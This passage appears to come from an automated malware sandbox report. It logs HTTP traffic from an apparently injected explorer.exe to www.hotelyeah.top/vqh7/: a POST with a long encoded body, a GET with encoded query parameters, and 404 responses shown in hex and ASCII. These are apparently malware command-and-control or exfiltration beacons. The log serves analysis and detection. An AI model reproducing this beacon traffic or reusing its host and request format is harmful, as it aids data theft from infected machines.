                                                              Data Ascii: u1ua=2BUfm1Xa4-YPIq4Ukov59n7mfpFDv6shHQljtPHhE0V92sg68pKAUTShhqcJrI95zznqpHjAtM9z9rL51WhCaCDUOKfuOLyMXfGxkLomDi(DUOEZSvhmt0~vlOeg(x5wt1JaTx~OYbEPObzmxfBddZr7YhAROJzi2p0LNZ5qLis7rYuTRQ).
                                                              Feb 10, 2023 12:45:54.500844955 CET215INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Fri, 10 Feb 2023 11:45:54 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                              Feb 10, 2023 12:45:54.500895977 CET215INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                              Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              17192.168.2.34970075.102.22.16880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:57.078356981 CET221OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.hotelyeah.top
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.hotelyeah.top
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.hotelyeah.top/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 32 42 55 66 6d 31 58 61 34 2d 59 50 4b 4a 67 55 6d 4c 33 35 34 48 37 6e 55 4a 46 44 34 71 73 74 48 51 70 6a 74 4f 44 50 46 43 6c 39 32 62 73 36 39 50 65 41 57 54 53 68 77 61 63 46 6c 6f 38 77 7a 77 61 52 70 48 53 31 74 4b 6c 7a 28 35 44 35 31 32 68 42 47 53 44 4a 43 71 66 70 54 37 79 4d 58 66 37 67 6b 4f 51 70 44 69 48 44 55 38 67 5a 53 74 35 6e 38 30 7e 71 74 75 65 67 28 78 39 76 74 31 4a 4b 54 78 6d 67 59 61 6b 50 4f 4e 28 6d 39 71 39 61 4c 35 72 38 56 42 42 54 4c 4a 36 35 7a 4a 6b 6a 4f 66 4e 70 43 6d 46 75 68 34 72 4b 46 4f 31 57 59 39 58 5f 50 47 71 35 50 6e 4e 4c 6e 75 44 37 71 6c 53 57 79 69 33 75 74 5f 68 6f 37 38 6c 5f 7a 58 51 66 6a 67 35 30 4a 33 63 62 50 36 59 63 64 6c 7e 44 63 57 79 45 49 46 32 6b 73 43 6f 64 53 4e 71 6e 68 76 72 5a 57 4d 28 34 32 44 71 5a 73 63 44 68 39 72 7a 58 4f 36 33 59 31 68 6b 57 45 66 4d 6b 32 56 47 31 64 2d 46 5f 6f 4c 7e 43 73 66 6a 69 35 30 71 64 63 68 49 6b 58 4e 74 76 6c 6c 51 75 41 62 74 41 65 78 35 6a 42 63 47 6f 50 53 65 77 31 6a 78 51 37 44 58 6b 57 33 4a 36 76 43 6c 6b 44 5f 71 6d 62 73 49 45 65 62 52 6e 55 71 78 69 77 66 34 39 72 6a 6b 47 62 4f 6d 55 5a 63 49 35 6e 6a 6f 66 37 71 73 30 31 45 6d 31 38 59 55 68 66 45 6f 45 6d 4a 6a 55 78 31 6c 70 50 36 47 37 68 6b 30 37 32 75 47 51 69 51 57 68 32 51 5a 7a 7a 65 46 6b 34 6c 75 46 4a 79 73 36 73 4f 38 70 33 44 51 36 39 64 6f 70 65 4b 4d 79 6f 39 4d 65 36 6b 53 43 39 62 6e 62 78 56 33 76 49 64 46 32 5a 31 51 58 34 79 72 7a 50 47 64 41 65 39 31 72 51 6f 34 79 58 7a 6c 65 49 36 70 34 71 77 73 4d 38 35 33 78 76 5f 7e 30 45 70 4c 39 63 6b 54 46 66 6a 51 30 6d 7a 61 32 4c 64 31 65 71 30 58 32 63 51 75 33 44 5f 4b 67 44 33 4f 70 62 34 6f 6d 66 63 65 4b 41 6a 34 4d 6c 30 6d 67 6c 66 6a 6f 61 38 54 76 31 41 75 4a 4d 7a 53 73 58 61 56 54 42 31 44 69 37 59 59 55 6c 41 71 58 55 49 46 31 68 32 35 68 50 46 52 6f 64 6a 58 2d 64 32 66 41 50 33 4a 68 51 34 68 68 66 43 45 4c 56 64 72 38 65 36 4a 46 51 71 30 67 46 41 71 5f 69 5f 4b 50 66 68 66 58 79 35 7e 4f 41 2d 75 45 77 47 5a 61 48 4a 6e 31 76 6b 49 4a 55 6c 39 7a 61 4d 36 4f 75 54 49 69 43 44 49 6e 46 65 35 36 41 48 47 70 39 73 53 54 4b 5a 6c 66 52 43 4a 4b 4b 44 41 39 33 39 55 78 4e 68 6f 50 30 71 4e 46 79 61 4e 61 48 41 43 30 6d 7a 6b 65 69 68 37 33 51 70 7a 41 34 37 58 51 30 59 36 79 63 4b 62 74 6b 42 54 69 36 50 48 78 55 2d 38 61 66 42 46 4a 64 33 67 67 78 71 4d 42 77 5f 57 39 59 5a 6d 30 6e 72 55 64 34 4e 58 49 6b 51 36 45 76 4e 38 68 66 50 31 32 64 65 69 78 6b 5f 66 74 46 42 7a 6d 47 53 75 46 59 30 61 35 70 65 37 46 30 6a 7e 73 68 6f 45 6f 74 4d 53 37 6b 74 44 42 72 42 75 42 50 4b 35 79 62 72 68 70 50 5f 4e 69 74 6e 4f 4b 74 69 65 7a 32 44 51 38 47 64 71 2d 51 78 45 7a 51 67 47 77 6f 2d 34 31 4a 63 44 59 30 69 57 72 77 64 39 7a 4f 4f 6b 6e 6e 65 41 31 51 36 73 55 69 33 69 53 56 35 68 73 66 77 51 6e 78 5a 55 4b 35 37 7a 76 43 2d 4f 4d 6c 45 57 36 30 52 71 4d 4d 37 46 72 68 68 54 6b 65 73 51 6b 75 63 32 4b 6b 67 4c 44 45 5a 44 50 28 52 44 79 42 62 4d 77 7e 31 70 42 55 68 61 74 53 50 6c 65 7e 35 45 4e 7a 70 57 6e 5a 38 4c 59 46 6d 65 7a 45 61 46 57 74 50 72 44 50 76 78 75 64 55 73 68 43 76 28 72 49 72 63 42 33 66 57 6c 74 62 62 53 36 4a 4a 67 78 45 45 4f 58 68 42 42 5a 39 6e 69 44 36 4c 6d 4c 38 37 77 65 2d 33 6c 6e 33 35 55 32 69 4e 37 72 70 41 50 57 38 41 47 43 4e 50 47 43 48 54 4b 6e 5f 4e 69 61 70 77 61 75 6f 72 4b 6a 6c 28 62 69 74 42 76 38 67 32 56 67 52 38 67 61 7a 38 49 6d 72 78 69 30 35 4b 69 38 57 63 71 30 4c 65 52 47 52 61 61 30 47 6c 31 28 69 59 39 7e 66 67 52 56 61 53 45 75 2d 4d 74 49 41 52 30 4a 55 5a 54 7e 2d 56 61 59 77 4d 78 61 45 52 56 73 58 63 77 70 39 35 5a 54 7a 38 73 51 76 48 78 67 4c 7a 50 68 33 38 6f 4a 61 6a 55 63 39 38 66 59 41 74 6f 73 59 7a 73 49 4c 6e 32 34 61 7a 31 78 47 76 78 55 50 38 47 4d 51 31 69 45 47 28 33 54 31 46 77 76 2d 76 59 46 4e 42 49 67 43 57 57 41 30 56 46 64 57 50 79 48 4b 78 78 30 43 59 37 49 6b 56 39 39 6c 4a 50 58 75 6b 45 4c 5a 67 44 73 33 33 45 7a 57 4c 57 66 47 6f 53 51 37 37 56 57 6a 70 76 6d 51 35 59 56 47 4f 38 61 69 77 67 55 4a 77 37 7e 52 52 6b 7e 6e 69 6f 69 44 7a 41 54 38 50 62 68 47 58 61 59 4c 68 49 42 49
                                                              Data Ascii: u1ua=2BUfm1Xa4-YPKJgUmL354H7nUJFD4qstHQpjtODPFCl92bs69PeAWTShwacFlo8wzwaRpHS1tKlz(5D512hBGSDJCqfpT7yMXf7gkOQpDiHDU8gZSt5n80~qtueg(x9vt1JKTxmgYakPON(m9q9aL5r8VBBTLJ65zJkjOfNpCmFuh4rKFO1WY9X_PGq5PnNLnuD7qlSWyi3ut_ho78l_zXQfjg50J3cbP6Ycdl~DcWyEIF2ksCodSNqnhvrZWM(42DqZscDh9rzXO63Y1hkWEfMk2VG1d-F_oL~Csfji50qdchIkXNtvllQuAbtAex5jBcGoPSew1jxQ7DXkW3J6vClkD_qmbsIEebRnUqxiwf49rjkGbOmUZcI5njof7qs01Em18YUhfEoEmJjUx1lpP6G7hk072uGQiQWh2QZzzeFk4luFJys6sO8p3DQ69dopeKMyo9Me6kSC9bnbxV3vIdF2Z1QX4yrzPGdAe91rQo4yXzleI6p4qwsM853xv_~0EpL9ckTFfjQ0mza2Ld1eq0X2cQu3D_KgD3Opb4omfceKAj4Ml0mglfjoa8Tv1AuJMzSsXaVTB1Di7YYUlAqXUIF1h25hPFRodjX-d2fAP3JhQ4hhfCELVdr8e6JFQq0gFAq_i_KPfhfXy5~OA-uEwGZaHJn1vkIJUl9zaM6OuTIiCDInFe56AHGp9sSTKZlfRCJKKDA939UxNhoP0qNFyaNaHAC0mzkeih73QpzA47XQ0Y6ycKbtkBTi6PHxU-8afBFJd3ggxqMBw_W9YZm0nrUd4NXIkQ6EvN8hfP12deixk_ftFBzmGSuFY0a5pe7F0j~shoEotMS7ktDBrBuBPK5ybrhpP_NitnOKtiez2DQ8Gdq-QxEzQgGwo-41JcDY0iWrwd9zOOknneA1Q6sUi3iSV5hsfwQnxZUK57zvC-OMlEW60RqMM7FrhhTkesQkuc2KkgLDEZDP(RDyBbMw~1pBUhatSPle~5ENzpWnZ8LYFmezEaFWtPrDPvxudUshCv(rIrcB3fWltbbS6JJgxEEOXhBBZ9niD6LmL87we-3ln35U2iN7rpAPW8AGCNPGCHTKn_NiapwauorKjl(bitBv8g2VgR8gaz8Imrxi05Ki8Wcq0LeRGRaa0Gl1(iY9~fgRVaSEu-MtIAR0JUZT~-VaYwMxaERVsXcwp95ZTz8sQvHxgLzPh38oJajUc98fYAtosYzsILn24az1xGvxUP8GMQ1iEG(3T1Fwv-vYFNBIgCWWA0VFdWPyHKxx0CY7IkV99lJPXukELZgDs33EzWLWfGoSQ77VWjpvmQ5YVGO8aiwgUJw7~RRk~nioiDzAT8PbhGXaYLhIBIrXDmHCSdl3lNtmyEVseh7ffRaS4_jYjkvfuVJpap1NH8Xz3Y1T0CYmqEwxSpzHQOTcgkkuQNTD3CzwUQ47pi6PUCxembdhY73USOBfSgMuSS4eqsKfR9X_5U1n2ax09WWLsZ7V6mVbUo6AnNXvuJCTxsbj6rZmZLc4byL9be(Gj1DUVpqn7Vy5s3LJAhJZq3uTquwxjic58WAmkA61DbQfS-7v1bcpde3PwLDLnA8ovCjUw0TstpbP57OAltI4XXvOWD2-1U3dgwT4ItGB7Rn046VTN7LB2ZE1ha3hlSwVUShtNZfZcE6pjGE8W2dbcqeG3NCiANr_7-TKT5aoHtIZepHFeKhiiNB995(hdMeI8MHXjiI0XkZjpW35xOSFo9ncpYkAdqm1jJRvCNnuxhV754gwYwcjqru3Xe6cQo(N1Xqb4j~rd7cOavKeXrp_UElCd_RxixIKjyQlhheUpgsYC16JwHP9IrMT6C9zjs(Zvqn9L-9dcLXymh6c1NyzauFdLVpRtjIbcehr(Glb9cOsmASkSzmtBVpfkl30uI9f2bQC9BupIe3ciFIlj-UqJ0Lp0Em5ehlxWZ44Wse61_UvrhZ1WYTmkKPAK1KsBal7QeUchGwrBc8WGS3KKOrr66oyPmcOPVK4~KI0~rtrPvJGmiT8LRLPVtk36r5o8yko54f4ePY7CNbPv1TMiJGqm4Vo8N7334rKwnKL(81Kip8eOSxvrruTt6cK5XDq0iXp9DIJUqRG0pA0F8a6MpK5sG0RB9F2AGuCOLSpGtMxqjQvCrXS30uledmtXCRwQSYPZW4njwKKax1VDhaHimQYnGuUZwmnEN8pi8YEFY5EbIDvPnMP7TtrAiFuv6UmT6id57MHk-R3pStm3R8ddfrJ3i~VmVYslJymWnl9fGRtzqNeEn8mbd~Ru2sCIuT9mezZeTK-(P1k2MCGtFxDwlReNEcmwW7MlpurRA5lLJ~pQI7wGDNQzmyIfg3HUTu5(boTZvlBtfTIfv(zu7p7vO~IM-qlaUVmd5OfJzj25BDJQaI-6zQcXhquicZRA3In~yCXBZEgxRl1q9OaUcjwX3UNJOUSHqIZMhBs706Em-G8VyivAGbiX3d4iEtdWHpiz9ccXA0VIrj_RH9YOZczwiN-N9tT9XV58EOq~IvuZvAIeyTpBi4i2BeQwHuouChyzm4v6Wbs5cI9OmBaIimVzxSqLjhybPfO42ersQmeocGQxHXdjSsHAfCvC3bQlyZMsPmGYn58ia04aL0KuTppLwe_~zdad_MZy3~3rjI2oqiiIna-fRIs(cAab2x35H4ThDpWiDODAl13gzqD~z2DBQclNWKIQv2t8L67RB01oor2er9LKMsN3mI3x5TNXJ8puXZcE5vEGq3ADJisoDYhhlizLqCTiqFvMuuTun(zF_MWPfKY1Ld3~n(O4wsKV9k8X_YDSnVFXm3B4SZRotKAqYOo7Z5cJUZCytMbtkCTZJjb4UN4Hk6LTrENpTTRePhqTIPO2Mtjttimw6chWUehELRovUtMdLidnCS0L7LarqGpgTKwXnbGqCCJugQaZtM0tzkkTH1C0z3n6ZQXo1uGRpszAAPncUOM6e7Gge545A4INCCmSm76OSipnb6izjd8G08PFQ9akEFak8YcBIviy1pmViPLjhMVJPat9xyclTBdhaJuCizEaQxtfQXTd9WTCEsIHhU443L7(c3S2DO7FZ8x5wzCpElWfp4D1dGO1S1LAbN1wRe72DducdQgHOVb(r8DelZMlX~72BlFvNVkWb2dNrGtj-B0g7CNayGwQIkjbyMnPGcTR003YPSlGPAUEi2IvPW8J7l2eIRlTW4SXXYXJxQxv-pGv-m6hQzUVxaCm4wEdQbc(A8iYsE5M2iaIH97dQEVHdXhJl(JO3rvl7NUkuCBLTEh~C8gWW9XMPu6v9kCKpcxMH38MLlUvicRnneZL7t33Vvz~AugMCKztzpSweAk7AiGS39RNrGUFn5IUx50QeFjTUhk5Us_THk9DI1lIi5MYXqgBovoAhUHeUMJpqyCNAuZOmfKUYfrPaTHjiIr8m4TZGpGT2Cb1a9UU7U3rQ09mFwnq7aBjMFrlt5lq_eAreuV(pnn4nxsGh94KhnXXTobv6~n4RkmGI0N3yoh2hqG8CkWDSGfCRfflTiWgGf1PX(ergsVhPA2RONodI~1WInte1Q06wj6exAOiEVbQz62dnhAzeIRDG6Ya4eaU6gWd9Ld1Ykzln5krrnp2h7zXjhRIM4HAZnk16iFG7Os604e7HJHlz(jGQeeDFb895TMC-8QGJdk6-hFP9Oks5peGb0_WU(KcwEMtR6bnACBC3lkVOJxyujAxPzKlH97Xhzh2PD99bRkYVFBq1h9(dpwX57xhrKhUKwWaatpi1DJLBXBoWYJzYSj8HnMOXPsePqG0Gs0QNTo8QLWqFF5PDjUUViPw28WLeJr4NvM3XBoTpZ_d233zXgSdD(U3o5dnnIwmjb90O4rihpCrAQMXKF7StHSIpd6c3cm5Y4y~7ZelI4jVddt9PYFtHspOGN1YB6fR76v4yK4a_UgAnBGbjIWAJGRHhYIZcTXZN9ATp74M4eCk5HWm9TDRbEmW9sUNcX8SNkAkgFnCbFhEq6Vx0TTyEI-Vlvog_XXEPAcl6PTJtwzEmeu8HEavyf5kV~S~QqSkiNP3yNCVUEWMDapmv(HOyne6GJw6TE6s
                                                              Feb 10, 2023 12:45:57.241301060 CET222INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Fri, 10 Feb 2023 11:45:56 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                              Feb 10, 2023 12:45:57.241322994 CET222INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                              Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              18192.168.2.34970175.102.22.16880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:59.764292955 CET223OUTGET /vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.hotelyeah.top
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:59.927357912 CET224INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Fri, 10 Feb 2023 11:45:59 GMT
                                                              server: LiteSpeed
